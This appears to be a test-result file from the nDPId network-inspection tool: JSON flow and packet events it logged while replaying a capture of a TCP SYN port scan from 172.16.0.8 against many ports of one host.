-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAssqIAACgGbdCsEAAIQA2GNIzSVEPdUoMYAAAAAGACBADgSwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAs7IIAAC4GLfCsEAAIQA2GNIzSFz7dUoMYAAAAAGACDAAVUQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsgF8AADEGlxOsEAAIQA2GNIzSI4zdUoMYAAAAAGACCAANAwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsiDYAADsGhTysEAAIQA2GNIzSwPjdUoMYAAAAAGACEABnlgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsHRgAADcG9FqsEAAIQA2GNIzSBGrdUoMYAAAAAGACEAAkJQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsbK4AACcGtMSsEAAIQA2GNIzSCzvdUoMYAAAAAGACEAAdVAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsOMAAADoG1bKsEAAIQA2GNIzSgBDdUoMYAAAAAGACDACsfgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060763,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_packet_id":1,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060763,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaMAACoG7M+sEAAIQA2GNIzSBhTdUoMYAAAAAGACDAAmewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060764,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_packet_id":1,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060764,"pkt":"ACYLMQczACWzv5HuCABFAAAsCNAAADYGCaOsEAAIQA2GNIzSA\/7dUoMYAAAAAGACDAAokQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qIAADcGLtCsEAAIQA2GNIzTBALdU4MZAAAAAGACEAAkigAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsLe8AADIG6IOsEAAIQA2GNIzTITTdU4MZAAAAAGACDAALWAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAss7UAADIGYr2sEAAIQA2GNIzTFrfdU4MZAAAAAGACDAAV1QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAACUGUHKsEAAIQA2GNIzSBE7dUoMYAAAAAGACCAAsQQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdwAADgG9pasEAAIQA2GNIzS1w\/dUoMYAAAAAGACBABdfwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsiwEAAC0GkHGsEAAIQA2GNIzSDSvdUoMYAAAAAGACCAAjZAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsYX4AACoGvPSsEAAIQA2GNIzSJyndUoMYAAAAAGACDAAFZgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsvdoAACUGZZisEAAIQA2GNIzSAmjdUoMYAAAAAGACCAAuJwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsRewAADEG0YasEAAIQA2GNIzSBA\/dUoMYAAAAAGACCAAsgAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADsGgXWsEAAIQA2GNIzSHcvdUoMYAAAAAGACEAAKxAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsouwAADMGcoasEAAIQA2GNIzSJ+fdUoMYAAAAAGACEAAAqAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsu48AACwGYOOsEAAIQA2GNIzSGiTdUoMYAAAAAGACBAAaawAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1UEAADAGQzGsEAAIQA2GNIzSE5HdUoMYAAAAAGACBAAg\/gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsf\/4AADcGkXSsEAAIQA2GNIzSCRPdUoMYAAAAAGACEAAffAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAstkgAACkGaSqsEAAIQA2GNIzSIGLdUoMYAAAAAGACCAAQLQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 